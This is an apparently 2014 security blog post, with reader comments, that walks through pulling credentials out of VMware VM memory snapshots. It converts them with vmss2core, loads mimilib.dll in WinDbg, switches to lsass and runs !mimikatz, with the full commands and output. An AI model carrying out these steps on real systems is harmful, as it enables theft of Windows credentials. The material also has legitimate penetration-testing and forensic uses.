Friday, June 13, 2014

Mimikatz Against Virtual Machine Memory Part 2


Short update to talk about mostly performing the actions from Part 1 on Windows 8+ and Windows Server 2012


First issue was symbols in windbg. Most importantly, NO symbols for windbg. I found this article that lets you remotely download them:

http://support.microsoft.com/kb/311503

.sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols


0: kd> .sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols
Expanded Symbol search path is: srv*f:\localsymbols*http://msdl.microsoft.com/download/symbols
0: kd> .reload
Loading Kernel Symbols
...............................................................
................................................................
..............
Loading User Symbols

Loading unloaded module list
.........


Second issue was creating the dmp file. I tried volatility's imagecopy and The Windows Memory Toolkit. Neither produced a dump file that would work with windbg for Windows 8 or Windows 2012. What did work was VMWare's vmss2core utility.

Note for VMware workstation/fusion you need to pass it the .vmsn and .vmem files (shown above)

For VMware ESXi i just needed to pass the .vmsn file

The rest follows the same flow as the previous post

1.  Load the memory.dmp file vmss2core created

2. Fix your symbols (shown above)

3. Load the mimilib.dll file

kd> .load C:\users\user\desktop\mimilib.dll

4. Find the lsass process

kd> !process 0 0 lsass.exe
PROCESS ffffe00112f08080
    SessionId: 0  Cid: 01e8    Peb: 7ff623aac000  ParentCid: 0194
    DirBase: 06291000  ObjectTable: ffffc001f8f0c400  HandleCount:
    Image: lsass.exe


5. Switch to that process

kd> .process /r /p ffffe00112f08080
Implicit process is now ffffe001`12f08080
Loading User Symbols
................................................................



6. Run Mimikatz

kd> !mimikatz


7. Drink Beers
CG

4 comments:

CG said...

from Benjamin
http://blog.gentilkiwi.com/retro-ingenierie/symboles-microsoft-windbg-ida-process-explorer-monitor

Anonymous said...

Very practical research! Can you apply your approach to an inception FireWire raw memory dump file, in your opinion? I have a 4GB memdump file akqired via FireWire from a customer laptop, but get the following error message, if I try to bin2dmp it:
"Initializing memory descriptors... Done.
Looking for kernel variables... Failed.
Cannot open file. Please check if the file is not being used."

thx in advance and thx for all your great input in the last couple of years!

CG said...

@anoymous i dont know on that one. sorry.

lcantoni said...

You may find useful to know that there is also a custom volatility plugin that promises to dump the passwords directly from the ram dump, without the need to open the image with WinDbg:

http://blog.digital-forensics.it/2014/03/et-voila-le-mimikatz-offline.html

https://code.google.com/p/hotoloti/

I didn't tested it but from the source it appears to support Windows 7 and Vista only, both 32 and 64.